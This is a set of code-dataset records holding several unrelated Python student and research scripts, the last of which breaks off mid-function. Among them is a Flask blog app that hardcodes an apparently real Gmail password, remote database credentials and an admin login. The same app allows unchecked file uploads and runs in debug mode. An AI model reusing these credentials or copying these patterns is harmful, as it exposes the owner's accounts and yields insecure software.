l.append(pp2)\n elif pp2 > pp1:\n break\n while len(l)!=0 and abs(l[-1] - pp1) > k:\n l.pop()\n for s in l:\n answer.append((i, pp1, s))\n break\n return(answer) \n\ndef positionalintersect2(p1,p2,k,invertedindex,tokenized):\n '''This function is modified version of the positionalintersect function.\n which means given the query word1 /k word2 is will return occurrences of word1 strictly before word2, within k words.'''\n\n answer=list()\n shareddoc = set(invertedindex[p1]) & set(invertedindex[p2]) #Find the shared documents set\n for i in shareddoc :\n # p1index=tokenized[i-1].index(p1)\n # p2index=tokenized[i-1].index(p2) \n p1indices = [i for i, x in enumerate(tokenized[i-1]) if x == p1]\n p2indices = [i for i, x in enumerate(tokenized[i-1]) if x == p2]\n l=list()\n for pp1 in p1indices:\n for pp2 in p2indices:\n while True:\n if 0 < pp2-pp1 <= k:\n l.append(pp2)\n elif pp1 > pp2:\n break\n elif pp2 > pp1:\n break\n while len(l)!=0 and abs(l[-1] - pp1) > k:\n l.pop()\n for s in l:\n answer.append((i, pp1, s))\n break\n return(answer) \n\ndef querytokenizer(query):\n '''Given query with following formt: \"p1 /k p2\"\n This function will return stemed strings of p1 and p2, and k as a intiger'''\n search_token = word_tokenize(query) #Tokenize\n search_token = [i.lower() for i in search_token] # Lower Case\n search_token = [porter.stem(word) for word in search_token] #Stem\n #Extract k\n r = re.compile(\"\\/\\d+\")\n m = r.findall(query)\n k=int(m[0].replace(\"/\", \"\"))\n p1=search_token[0]\n p2=search_token[-1]\n return(p1,p2,k)\n\n\ndef submain(docs = \"docs.txt\"):\n query=input(\"Please give me the query (format: p1 /k p2)\")\n qtype=input(\"Which type of query do you want? (type 'a' for the directional positional intersect (part2), otherwise it will use regular positional intersect (part 1))\")\n invertedindex,tokenized =invertindex(docs)\n p1,p2,k = querytokenizer(query)\n if qtype == \"a\":\n answer=positionalintersect2(p1,p2,k,invertedindex,tokenized)\n else:\n answer=positionalintersect(p1,p2,k,invertedindex,tokenized)\n print(answer)\n return(answer)\n\ndef main():\n while True:\n submain()\n\n\nif __name__ == '__main__':\n main()","sub_path":"2/Ehsani_Sina_HW2/Ehsani_Sina_code/Ehsani_Sina_HW2.py","file_name":"Ehsani_Sina_HW2.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"69140618","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\n#driver = webdriver.Chrome('C:\\\\Users\\itach\\AppData\\Local\\Programs\\Python\\Python37-32\\Lib\\site-packages\\selenium\\webdriver') # Optional argument, if not specified will search path.\r\n#driver = webdriver.Chrome('C:\\\\Webdrivers') \r\ndriver = webdriver.Chrome('C:\\\\Users\\itach\\Downloads\\chromedriver_win32 (1)\\chromedriver.exe') \r\n\r\ndriver.get('http://www.google.com/')\r\n\r\ntime.sleep(5) # Let the user actually see something!\r\n\r\nsearch_box = driver.find_element_by_name('q')\r\nsearch_box.send_keys('ChromeDriver')\r\nsearch_box.submit()\r\ntime.sleep(5) # Let the user actually see something!\r\n\r\ndriver.close()\r\n\r\n#Message: 'webdriver' executable may have wrong permissions. \r\n\r\n","sub_path":"webdriver.py","file_name":"webdriver.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"442821217","text":"import argparse\n\nimport hail\nfrom hail.expr import TDouble, TInt, TString\n\nfrom hail_scripts.v01.utils.elasticsearch_client import ElasticsearchClient\n\n\np = argparse.ArgumentParser()\np.add_argument(\"--host\", help=\"Elasticsearch host or IP\", required=True)\np.add_argument(\"--port\", help=\"Elasticsearch port\", default=9200, type=int)\np.add_argument(\"--num-shards\", help=\"Number of elasticsearch shards\", default=2, type=int)\np.add_argument(\"--block-size\", help=\"Elasticsearch block size to use when exporting\", default=1000, type=int)\nargs = p.parse_args()\n\nhc = hail.HailContext(log=\"/tmp/hail.log\")\n\ngene_results_url = \"gs://epi-browser/2018-11-07_epi25-exome-browser-gene-results-table-reduced.csv\"\n\nkt = hc.import_table(\n gene_results_url,\n delimiter=\",\",\n missing=\"NA\",\n quote='\"',\n types={\n 'gene_name': TString(),\n 'description': TString(),\n 'gene_id': TString(),\n 'xcase_lof': TInt(),\n 'xctrl_lof': TInt(),\n 'pval_lof': TDouble(),\n 'xcase_mpc': TInt(),\n 'xctrl_mpc': TInt(),\n 'pval_mpc': TDouble(),\n 'xcase_infrIndel': TInt(),\n 'xctrl_infrIndel': TInt(),\n 'pval_infrIndel': TDouble(),\n 'pval_meta': TDouble(),\n 'analysis_group': TString(),\n }\n)\n\nkt = kt.annotate('analysis_group = if (analysis_group == \"EE\") \"DEE\" else analysis_group')\n\nes = ElasticsearchClient(args.host, args.port)\n\nes.export_kt_to_elasticsearch(\n kt,\n index_name=\"epi25_gene_results_181107\",\n index_type_name=\"result\",\n block_size=args.block_size,\n num_shards=args.num_shards,\n delete_index_before_exporting=True,\n verbose=True,\n)\n","sub_path":"projects/exome-results-browsers/browsers/epi25/data/load_gene_results_to_es.py","file_name":"load_gene_results_to_es.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"624905194","text":"from const import COLUMN_FOR_HUAWEI_1000, PROCESSED_DATA_PATH, SUB_NAMES, RAW_DATA_PATH, HUAWEI_DATA_PATH,\\\n COLUMN_FOR_HUAWEI, FPA_TRIALS, TRUNK_SUBTRIAL_NAMES, TRIAL_NAMES, MOCAP_SAMPLE_RATE\nimport os\nimport pandas as pd\nimport xlrd\n\n\ndef initialize_path(huawei_data_path, subject_folder):\n # create folder for this subject\n fre_200_path = huawei_data_path + '\\\\' + subject_folder + '\\\\200Hz'\n fre_1000_path = huawei_data_path + '\\\\' + subject_folder + '\\\\1000Hz'\n if not os.path.exists(huawei_data_path + '\\\\' + subject_folder):\n os.makedirs(huawei_data_path + '\\\\' + subject_folder)\n if not os.path.exists(fre_200_path):\n os.makedirs(fre_200_path)\n if not os.path.exists(fre_1000_path):\n os.makedirs(fre_1000_path)\n return fre_200_path, fre_1000_path\n\n\ndef copy_200_data(trial_name):\n # copy 200 Hz data\n gait_data_200_df = pd.read_csv(ori_200_path + '\\\\' + trial_name + '.csv', index_col=False)\n gait_data_200_df_hw = gait_data_200_df[COLUMN_FOR_HUAWEI]\n data_file_str = '{folder_path}\\\\{trial_name}.csv'.format(\n folder_path=fre_200_path, trial_name=trial_name)\n gait_data_200_df_hw.to_csv(data_file_str, index=False)\n\n\ndef copy_param_data(trial_name):\n param_data_200_df = pd.read_csv(ori_200_path + '\\\\param_of_' + trial_name + '.csv', index_col=False)\n data_file_str = '{folder_path}\\\\param_of_{trial_name}.csv'.format(\n folder_path=fre_200_path, trial_name=trial_name)\n param_data_200_df.to_csv(data_file_str, index=False)\n\n\ndef copy_1000_data(trial_name):\n # copy 1000 Hz data\n gait_data_1000_df = pd.read_csv(ori_1000_path + '\\\\' + trial_name + '.csv', index_col=False)\n gait_data_1000_df_hw = gait_data_1000_df[COLUMN_FOR_HUAWEI_1000]\n data_file_str = '{folder_path}\\\\{trial_name}.csv'.format(\n folder_path=fre_1000_path, trial_name=trial_name)\n gait_data_1000_df_hw.to_csv(data_file_str, index=False)\n\n\ndef split_subtrial(trial_name, subtrials_to_keep, sensor_sampling_fre=MOCAP_SAMPLE_RATE):\n trunk_subtrial_names = TRUNK_SUBTRIAL_NAMES\n\n gait_data_200_df = pd.read_csv(ori_200_path + '\\\\' + trial_name + '.csv', index_col=False)\n param_data_200_df = pd.read_csv(ori_200_path + '\\\\param_of_' + trial_name + '.csv', index_col=False)\n gait_data_1000_df = pd.read_csv(ori_1000_path + '\\\\' + trial_name + '.csv', index_col=False)\n\n readme_sheet = xlrd.open_workbook(readme_xls).sheet_by_index(0)\n trial_id = TRIAL_NAMES.index(trial_name)\n if 'trunk' in trial_name:\n subtrial_ends = readme_sheet.row_values(trial_id + 2)[6:12]\n else:\n raise ValueError('Only split trunk trials')\n subtrial_ends = [int(element / MOCAP_SAMPLE_RATE * sensor_sampling_fre) for element in subtrial_ends]\n subtrial_duration = sensor_sampling_fre * 60\n for subtrial_id in subtrials_to_keep:\n subtrial_end = subtrial_ends[subtrial_id]\n subtrial_start = subtrial_end - subtrial_duration\n subtrial_name = trunk_subtrial_names[subtrial_id] + trial_name[-3:]\n\n gait_data_200_df_hw = gait_data_200_df[COLUMN_FOR_HUAWEI]\n gait_data_200_df_hw = gait_data_200_df_hw.iloc[subtrial_start:subtrial_end]\n data_file_str = '{folder_path}\\\\{subtrial_name}.csv'.format(\n folder_path=fre_200_path, subtrial_name=subtrial_name)\n gait_data_200_df_hw.to_csv(data_file_str, index=False)\n\n param_data_200_df_hw = param_data_200_df.iloc[subtrial_start:subtrial_end]\n data_file_str = '{folder_path}\\\\param_of_{trial_name}.csv'.format(\n folder_path=fre_200_path, trial_name=subtrial_name)\n param_data_200_df_hw.to_csv(data_file_str, index=False)\n\n gait_data_1000_df_hw = gait_data_1000_df[COLUMN_FOR_HUAWEI_1000]\n gait_data_1000_df_hw = gait_data_1000_df_hw.iloc[subtrial_start:subtrial_end]\n data_file_str = '{folder_path}\\\\{trial_name}.csv'.format(\n folder_path=fre_1000_path, trial_name=subtrial_name)\n gait_data_1000_df_hw.to_csv(data_file_str, index=False)\n\n\nfor subject_folder in SUB_NAMES:\n print(subject_folder)\n ori_200_path = PROCESSED_DATA_PATH + '\\\\' + subject_folder + '\\\\200Hz'\n ori_1000_path = PROCESSED_DATA_PATH + '\\\\' + subject_folder + '\\\\1000Hz'\n fre_200_path, fre_1000_path = initialize_path(HUAWEI_DATA_PATH, subject_folder)\n\n readme_xls = RAW_DATA_PATH + subject_folder + '\\\\readme\\\\readme_' + subject_folder + '.xlsx'\n\n # init static\n copy_200_data('static')\n copy_1000_data('static')\n copy_200_data('static trunk')\n copy_param_data('static trunk')\n copy_1000_data('static trunk')\n\n for trial_name in [TRIAL_NAMES[4], TRIAL_NAMES[7], TRIAL_NAMES[10]]:\n split_subtrial(trial_name, [0, 2, 4])\n\n # init FPA trials\n for trial_name in FPA_TRIALS:\n copy_200_data(trial_name)\n copy_param_data(trial_name)\n copy_1000_data(trial_name)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"0_preprocessing/data_for_huawei.py","file_name":"data_for_huawei.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"371833464","text":"class Solution(object):\n def grayCode(self, n):\n \"\"\"\n :type n: int\n :rtype: List[int]\n \"\"\"\n if n == 0:\n return [0]\n\n if n == 1:\n return [0, 1]\n\n res = [0, 1]\n\n for i in range(1, n):\n length = len(res) # 当前列表的长度\n for j in range(length):\n res.append(length + res[length - j - 1])\n\n return res\n\n\n\n\nif __name__ == '__main__':\n n = 3\n res = Solution().grayCode(n)\n print(res)","sub_path":"leetcode/51-100/_89_grayCode.py","file_name":"_89_grayCode.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"70900728","text":"'''\r\nthis is the trainer of the 'Future Frame Prediction for Anomaly Detection - A New Baseline CVPR2018'\r\n'''\r\n#!!!!! ignore the warning messages\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport os\r\nimport pickle\r\nimport math\r\nimport torch\r\nimport time\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom collections import OrderedDict\r\nfrom torch.utils.data import DataLoader\r\nimport torchvision.transforms as T\r\nimport torchvision.transforms.functional as tf\r\n\r\nfrom pyanomaly.core.engine.default_engine import DefaultTrainer, DefaultInference\r\nfrom pyanomaly.core.utils import AverageMeter, multi_obj_grid_crop, frame_gradient, get_batch_dets, tensorboard_vis_images, ParamSet, make_info_message\r\nfrom pyanomaly.datatools.evaluate.utils import psnr_error\r\n\r\ntry:\r\n from sklearn.externals import joblib\r\nexcept:\r\n import joblib\r\n\r\nclass Trainer(DefaultTrainer):\r\n NAME = [\"OCAE.TRAIN\"]\r\n def custom_setup(self):\r\n # basic things\r\n if self.kwargs['parallel']:\r\n self.A = self.data_parallel(self.model['A'])\r\n self.B = self.data_parallel(self.model['B'])\r\n self.C = self.data_parallel(self.model['C'])\r\n self.Detector = self.data_parallel(self.model['Detector'])\r\n else:\r\n self.A = self.model['A'].cuda()\r\n self.B = self.model['B'].cuda()\r\n self.C = self.model['C'].cuda()\r\n self.Detector = self.model['Detector'].cuda()\r\n \r\n self.ovr_model = self.model['OVR']\r\n\r\n # get the optimizer\r\n self.optim_ABC = self.optimizer['optimizer_abc']\r\n\r\n # get the loss_fucntion\r\n self.a_loss = self.loss_function['A_loss']\r\n self.b_loss = self.loss_function['B_loss']\r\n self.c_loss = self.loss_function['C_loss']\r\n\r\n # the lr scheduler\r\n self.lr_abc = self.lr_scheduler_dict['optimizer_abc_scheduler']\r\n\r\n # basic meter\r\n self.loss_meter_ABC = AverageMeter(name='loss_ABC')\r\n\r\n self.test_dataset_keys = self.kwargs['test_dataset_keys']\r\n self.test_dataset_dict = self.kwargs['test_dataset_dict']\r\n\r\n self.cluster_dataset_keys = self.kwargs['cluster_dataset_keys']\r\n self.cluster_dataset_dict = self.kwargs['cluster_dataset_dict']\r\n\r\n self.ovr_model_path = os.path.join(self.config.TRAIN.model_output, f'ocae_cfg@{self.config_name}#{self.verbose}.npy') \r\n\r\n \r\n def train(self,current_step):\r\n # Pytorch [N, C, D, H, W]\r\n # initialize\r\n start = time.time()\r\n self.set_requires_grad(self.A, True)\r\n self.set_requires_grad(self.B, True)\r\n self.set_requires_grad(self.C, True)\r\n self.set_requires_grad(self.Detector, False)\r\n self.A.train()\r\n self.B.train()\r\n self.C.train()\r\n self.Detector.eval()\r\n writer = self.kwargs['writer_dict']['writer']\r\n global_steps = self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])]\r\n\r\n # get the data\r\n data, _ = next(self._train_loader_iter) # the core for dataloader\r\n self.data_time.update(time.time() - start)\r\n \r\n # base on the D to get each frame\r\n # in this method, D = 3 and not change\r\n future = data[:, :, -1, :, :].cuda() # t+1 frame \r\n current = data[:, :, 1, :, :].cuda() # t frame\r\n past = data[:, :, 0, :, :].cuda() # t-1 frame\r\n\r\n bboxs = get_batch_dets(self.Detector, current)\r\n # this method is based on the objects to train the model insted of frames\r\n for index, bbox in enumerate(bboxs):\r\n if bbox.numel() == 0:\r\n bbox = bbox.new_zeros([1, 4])\r\n # get the crop objects\r\n input_currentObject_B, _ = multi_obj_grid_crop(current[index], bbox)\r\n future_object, _ = multi_obj_grid_crop(future[index], bbox)\r\n # future2current = torch.stack([future_object, input_currentObject_B], dim=1)\r\n current2future = torch.stack([input_currentObject_B, future_object], dim=1)\r\n past_object, _ = multi_obj_grid_crop(past[index], bbox)\r\n # current2past = torch.stack([input_currentObject_B, past_object], dim=1)\r\n past2current = torch.stack([past_object, input_currentObject_B], dim=1)\r\n\r\n _, _, input_objectGradient_A = frame_gradient(current2future)\r\n input_objectGradient_A = input_objectGradient_A.sum(1)\r\n _, _, input_objectGradient_C = frame_gradient(past2current)\r\n input_objectGradient_C = input_objectGradient_C.sum(1)\r\n # import ipdb; ipdb.set_trace()\r\n # True Process =================Start===================\r\n # original_A = (0.3 * input_objectGradient_A[:,0] + 0.59 * input_objectGradient_A[:,1] + 0.11 * input_objectGradient_A[:,2]).unsqueeze(1)\r\n # original_B = (0.3 * input_currentObject_B[:,0] + 0.59 * input_currentObject_B[:,1] + 0.11 * input_currentObject_B[:,2]).unsqueeze(1)\r\n # original_C = (0.3 * input_objectGradient_C[:,0] + 0.59 * input_objectGradient_C[:,1] + 0.11 * input_objectGradient_C[:,2]).unsqueeze(1)\r\n _, output_recGradient_A, original_A = self.A(input_objectGradient_A)\r\n _, output_recObject_B, original_B = self.B(input_currentObject_B)\r\n _, output_recGradient_C, original_C = self.C(input_objectGradient_C)\r\n # import ipdb; ipdb.set_trace()\r\n # loss_A = self.a_loss(output_recGradient_A, input_objectGradient_A)\r\n # loss_B = self.b_loss(output_recObject_B, input_currentObject_B)\r\n # loss_C = self.c_loss(output_recGradient_C, input_objectGradient_C)\r\n loss_A = self.a_loss(output_recGradient_A, original_A)\r\n loss_B = self.b_loss(output_recObject_B, original_B)\r\n loss_C = self.c_loss(output_recGradient_C, original_C)\r\n\r\n loss_all = self.loss_lamada['A_loss'] * loss_A + self.loss_lamada['B_loss'] * loss_B + self.loss_lamada['C_loss'] * loss_C\r\n self.optim_ABC.zero_grad()\r\n loss_all.backward()\r\n self.optim_ABC.step()\r\n # record\r\n self.loss_meter_ABC.update(loss_all.detach())\r\n if self.config.TRAIN.general.scheduler.use:\r\n self.lr_abc.step()\r\n \r\n # ======================End==================\r\n\r\n self.batch_time.update(time.time() - start)\r\n\r\n if (current_step % self.steps.param['log'] == 0):\r\n msg = make_info_message(current_step, self.steps.param['max'], self.kwargs['model_type'], self.batch_time, self.config.TRAIN.batch_size, self.data_time, [self.loss_meter_ABC])\r\n self.logger.info(msg)\r\n writer.add_scalar('Train_loss_ABC', self.loss_meter_ABC.val, global_steps)\r\n\r\n if (current_step % self.steps.param['vis'] == 0):\r\n vis_objects = OrderedDict({\r\n 'train_input_objectGradient_A': input_objectGradient_A.detach(),\r\n 'train_input_currentObject_B': input_currentObject_B.detach(),\r\n 'train_input_objectGradient_C': input_objectGradient_C.detach(),\r\n 'train_output_recGradient_A': output_recGradient_A.detach(),\r\n 'train_output_recObject_B': output_recObject_B.detach(),\r\n 'train_output_recGradient_C': output_recGradient_C.detach()\r\n })\r\n tensorboard_vis_images(vis_objects, writer, global_steps, self.normalize.param['train'])\r\n global_steps += 1 \r\n # reset start\r\n start = time.time()\r\n \r\n self.saved_model = {'A':self.A, 'B':self.B, 'C':self.C}\r\n self.saved_optimizer = {'optim_ABC': self.optim_ABC}\r\n self.saved_loss = {'loss_ABC':self.loss_meter_ABC.val}\r\n self.kwargs['writer_dict']['global_steps_{}'.format(self.kwargs['model_type'])] = global_steps\r\n \r\n def mini_eval(self, current_step):\r\n if current_step % self.steps.param['mini_eval'] != 0:\r\n return\r\n temp_meter_A = AverageMeter()\r\n temp_meter_B = AverageMeter()\r\n temp_meter_C = AverageMeter()\r\n \r\n self.set_requires_grad(self.A, False)\r\n self.set_requires_grad(self.B, False)\r\n self.set_requires_grad(self.C, False)\r\n self.set_requires_grad(self.Detector, False)\r\n self.A.eval()\r\n self.B.eval()\r\n self.C.eval()\r\n self.Detector.eval()\r\n\r\n for data, _ in self.val_dataloader:\r\n # base on the D to get each frame\r\n # in this method, D = 3 and not change\r\n future_mini = data[:, :, -1, :, :].cuda() # t+1 frame \r\n current_mini = data[:, :, 1, :, :].cuda() # t frame\r\n past_mini = data[:, :, 0, :, :].cuda() # t-1 frame\r\n\r\n bboxs_mini = get_batch_dets(self.Detector, current_mini)\r\n\r\n for index, bbox in enumerate(bboxs_mini):\r\n if bbox.numel() == 0:\r\n bbox = bbox.new_zeros([1, 4])\r\n # get the crop objects\r\n input_currentObject_B, _ = multi_obj_grid_crop(current_mini[index], bbox)\r\n future_object, _ = multi_obj_grid_crop(future_mini[index], bbox)\r\n future2current = torch.stack([future_object, input_currentObject_B], dim=1)\r\n past_object, _ = multi_obj_grid_crop(past_mini[index], bbox)\r\n current2past = torch.stack([input_currentObject_B, past_object], dim=1)\r\n\r\n _, _, input_objectGradient_A = frame_gradient(future2current)\r\n input_objectGradient_A = input_objectGradient_A.sum(1)\r\n _, _, input_objectGradient_C = frame_gradient(current2past)\r\n input_objectGradient_C = input_objectGradient_C.sum(1)\r\n \r\n _, output_recGradient_A, _ = self.A(input_objectGradient_A)\r\n _, output_recObject_B, _ = self.B(input_currentObject_B)\r\n _, output_recGradient_C, _ = self.C(input_objectGradient_C)\r\n\r\n psnr_A = psnr_error(output_recGradient_A.detach(), input_objectGradient_A)\r\n psnr_B = psnr_error(output_recObject_B.detach(), input_currentObject_B)\r\n psnr_C = psnr_error(output_recGradient_C.detach(), input_objectGradient_C)\r\n temp_meter_A.update(psnr_A.detach())\r\n temp_meter_B.update(psnr_B.detach())\r\n temp_meter_C.update(psnr_C.detach())\r\n\r\n self.logger.info(f'&^*_*^& ==> Step:{current_step}/{self.steps.param[\"max\"]} the A PSNR is {temp_meter_A.avg:.2f}, the B PSNR is {temp_meter_B.avg:.2f}, the C PSNR is {temp_meter_C.avg:.2f}')\r\n\r\n\r\nclass Inference(DefaultInference):\r\n NAME = [\"OCAE.INFERENCE\"]\r\n def custom_setup(self):\r\n if self.kwargs['parallel']:\r\n self.A = self.data_parallel(self.model['A'].load_state_dict(self.save_model['A']))\r\n self.B = self.data_parallel(self.model['B'].load_state_dict(self.save_model['B']))\r\n self.C = self.data_parallel(self.model['C'].load_state_dict(self.save_model['C']))\r\n self.Detector = self.data_parallel(self.model['Detector'])\r\n else:\r\n self.A = self.model['A'].load_state_dict(self.save_model['A']).cuda()\r\n self.B = self.model['B'].load_state_dict(self.save_model['B']).cuda()\r\n self.C = self.model['C'].load_state_dict(self.save_model['C']).cuda()\r\n self.Detector = self.model['Detector'].cuda()\r\n \r\n self.ovr_model_path = os.path.join(self.config.TRAIN.model_output, f'ocae_cfg@{self.config_name}#{self.verbose}.npy')\r\n self.ovr_model = self.model['OVR']\r\n self.ovr_model = joblib.load(self.ovr_model_path)\r\n\r\n self.test_dataset_keys = self.kwargs['test_dataset_keys']\r\n self.test_dataset_dict = self.kwargs['test_dataset_dict']\r\n\r\n def inference(self):\r\n for h in self._hooks:\r\n h.inference()\r\n ","sub_path":"pyanomaly/core/ocae.py","file_name":"ocae.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"139732064","text":"from flask import Flask, render_template, request, session,redirect\nfrom werkzeug.utils import secure_filename\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_mail import Mail\nimport os\nfrom datetime import datetime\nimport math\n\nlocal_host = False\nmailn = 'yashmahajan1142@gmail.com'\n\napp = Flask(__name__)\n\nmailgun_secret_key_value = os.environ.get('MAILGUN_SECRET_KEY', None)\nport = int(os.environ.get(\"PORT\", 5001))\n\napp.secret_key = 'super-secret-key'\napp.config['uploader'] = \"E:\\\\flask\\\\static\\\\img\"\napp.config.update(\n MAIL_SERVER = 'smtp.gmail.com',\n MAIL_USE_TLS = 'True',\n MAIL_PORT = '587',\n MAIL_USERNAME = 'yashmahajan1142@gmail.com',\n MAIL_PASSWORD = 'Mahajan2001'\n)\nmail = Mail(app)\nif local_host==True:\n app.config['SQLALCHEMY_DATABASE_URI'] = \"mysql+pymysql://root:@localhost/team rahi\"\nelse:\n app.config['SQLALCHEMY_DATABASE_URI'] = \"mysql+pymysql://KTzygVZtCD:ZaWGvTyHxA@remotemysql.com/KTzygVZtCD\"\n\ndb = SQLAlchemy(app)\n\n\nclass Contents(db.Model):\n\n sno = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n phno = db.Column(db.String(12), nullable=False)\n date = db.Column(db.String(12),nullable=True)\n email = db.Column(db.String(20), nullable=False)\n\n\nclass Blogs(db.Model):\n number = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(80), nullable=False)\n tag_line = db.Column(db.String(80), nullable=False)\n slug = db.Column(db.String(12), nullable=False)\n content = db.Column(db.String(12), nullable=True)\n date = db.Column(db.String(20), nullable=False)\n by = db.Column(db.String(20), nullable=False)\n img_file = db.Column(db.String(20), nullable=False)\n\n@app.route(\"/\")\ndef home():\n posts = Blogs.query.filter_by().all()\n last = math.ceil(len(posts)/4)\n page = request.args.get(\"page\")\n if not str(page).isnumeric():\n page = 1\n\n page = int(page)\n if page==last:\n posts = posts[0:0+last]\n else:\n posts = posts[(len(posts)-4*(page-1))-4:len(posts)-4*(page-1)]\n if page==1:\n befor = \"#\"\n next = \"/?page=\"+ str(page+1)\n\n elif page==last:\n befor = \"/?page=\" + str(page - 1)\n next = \"#\"\n\n else:\n befor = \"/?page=\" + str(page - 1)\n next = \"/?page=\" + str(page + 1)\n return render_template('index.html', posts=posts , befor=befor , next=next)\n\n\n@app.route(\"/upload\",methods = ['GET','POST'])\ndef upload():\n if 'user' in session and session['user'] == 'Nishit':\n if request.method == \"POST\":\n f = request.files[\"file\"]\n f.save(os.path.join(app.config[\"uploader\"],secure_filename(f.filename)))\n return \"uploaded successfully\"\n return \"create session first\"\n\n@app.route(\"/delet/\",methods = ['GET','POST'])\ndef delet(sno):\n if 'user' in session and session['user'] == 'Nishit':\n post = Blogs.query.filter_by(number=sno).first()\n db.session.delete(post)\n db.session.commit()\n return redirect('/dashboard')\n\n@app.route(\"/logout\")\ndef logout():\n session.pop('user')\n return redirect(\"/\")\n\n\n@app.route(\"/dashboard\",methods=['GET','POST'])\ndef dashboard():\n\n if 'user' in session and session['user'] == 'Nishit':\n posts = Blogs.query.all()\n return render_template('dashboard.html',posts = posts)\n\n if request.method=='POST':\n username = request.form.get('uname')\n userpass = request.form.get('pass')\n if username == 'Nishit' and userpass == '1142':\n session['user'] = username\n posts = Blogs.query.all()\n return render_template('dashboard.html',posts = posts)\n\n\n return render_template('login.html')\n\n@app.route(\"/post/\",methods=['GET'])\ndef post_route(post_slug):\n post = Blogs.query.filter_by(slug=post_slug).first()\n return render_template('post.html',post = post)\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html')\n\n@app.route(\"/edit/\",methods = ['GET','POST'])\ndef edit(sno):\n if 'user' in session and session['user'] == 'Nishit':\n if (request.method == 'POST'):\n title = request.form.get('title')\n tline = request.form.get('tagline')\n slug = request.form.get('slug')\n content = request.form.get('content')\n img_file = request.form.get('img_file')\n by = request.form.get('by')\n date = datetime.now()\n\n if sno == '0':\n post = Blogs(title=title,tag_line=tline,slug=slug,content=content,date=datetime.now(),img_file=img_file,by=by)\n db.session.add(post)\n db.session.commit()\n else:\n post = Blogs.query.filter_by(number=sno).first()\n post.title = title\n post.tagline = tline\n post.slug = slug\n post.content = content\n post.img_file = img_file\n post.by = by\n db.session.commit()\n return redirect('/dashboard')\n post = Blogs.query.filter_by(number=sno).first()\n return render_template('edit.html',post = post,sno=sno)\n\n\n\n\n\n@app.route(\"/contact\",methods = ['GET','POST'])\ndef contact():\n if (request.method == 'POST'):\n '''Add entry to the database'''\n name = request.form.get('name')\n phone = request.form.get('phone')\n email = request.form.get('email')\n message = request.form.get('message')\n\n\n entry = Contents(name=name, phno=phone, date=datetime.now() ,email=email)\n db.session.add(entry)\n db.session.commit()\n mail.send_message('new message from blog', sender = email, recipients = mailn.split(), body = message +\"\\n\" + phone)\n return render_template('contact.html')\n\n\napp.run(host='0.0.0.0',port=port,debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"447448689","text":"class SortingRobot:\n def __init__(self, l):\n \"\"\"\n SortingRobot takes a list and sorts it.\n \"\"\"\n self._list = l # The list the robot is tasked with sorting\n self._item = None # The item the robot is holding\n self._position = 0 # The list position the robot is at\n self._light = \"OFF\" # The state of the robot's light\n self._time = 0 # A time counter (stretch)\n\n def can_move_right(self):\n \"\"\"\n Returns True if the robot can move right or False if it's\n at the end of the list.\n \"\"\"\n return self._position < len(self._list) - 1\n\n def can_move_left(self):\n \"\"\"\n Returns True if the robot can move left or False if it's\n at the start of the list.\n \"\"\"\n return self._position > 0\n\n def move_right(self):\n \"\"\"\n If the robot can move to the right, it moves to the right and\n returns True. Otherwise, it stays in place and returns False.\n This will increment the time counter by 1.\n \"\"\"\n self._time += 1\n if self._position < len(self._list) - 1:\n self._position += 1\n return True\n else:\n return False\n\n def move_left(self):\n \"\"\"\n If the robot can move to the left, it moves to the left and\n returns True. Otherwise, it stays in place and returns False.\n This will increment the time counter by 1.\n \"\"\"\n self._time += 1\n if self._position > 0:\n self._position -= 1\n return True\n else:\n return False\n\n def swap_item(self):\n \"\"\"\n The robot swaps its currently held item with the list item in front\n of it.\n This will increment the time counter by 1.\n \"\"\"\n self._time += 1\n # Swap the held item with the list item at the robot's position\n self._item, self._list[self._position] = self._list[self._position], self._item\n\n def compare_item(self):\n \"\"\"\n Compare the held item with the item in front of the robot:\n If the held item's value is greater, return 1.\n If the held item's value is less, return -1.\n If the held item's value is equal, return 0.\n If either item is None, return None.\n \"\"\"\n if self._item is None or self._list[self._position] is None:\n return None\n elif self._item > self._list[self._position]:\n return 1\n elif self._item < self._list[self._position]:\n return -1\n else:\n return 0\n\n def set_light_on(self):\n \"\"\"\n Turn on the robot's light\n \"\"\"\n self._light = \"ON\"\n def set_light_off(self):\n \"\"\"\n Turn off the robot's light\n \"\"\"\n self._light = \"OFF\"\n def light_is_on(self):\n \"\"\"\n Returns True if the robot's light is on and False otherwise.\n \"\"\"\n return self._light == \"ON\"\n\n '''\n My 2 cents for this before I start working... \n -the light function is a boolean determining whether swaps/changes occured \n -using while loop/ way to \"break out\" with light/boolean (thanks Brady)\n -once in loop, we need to move right to start comparing the items.. \n so well need to check if we can move right first and if we can, then move, and go into the next step \n of comparing the items\n - well need to compare the items, the one currently held and the one in front of robot\n - if the one ebing held is larger, well have to swap them and then go back and put the smaller one\n we just picked up down, and then move forward again\n -if the one being held is smaller, then we just move back or to the left and put it back and then continue moving forward/right.\n - we continue this until we can no longer move right/end of list\n - lets see if this works... \n ''' \n def sort(self):\n \"\"\"\n Sort the robot's list.\n \"\"\"\n self.set_light_on()\n # start\n while 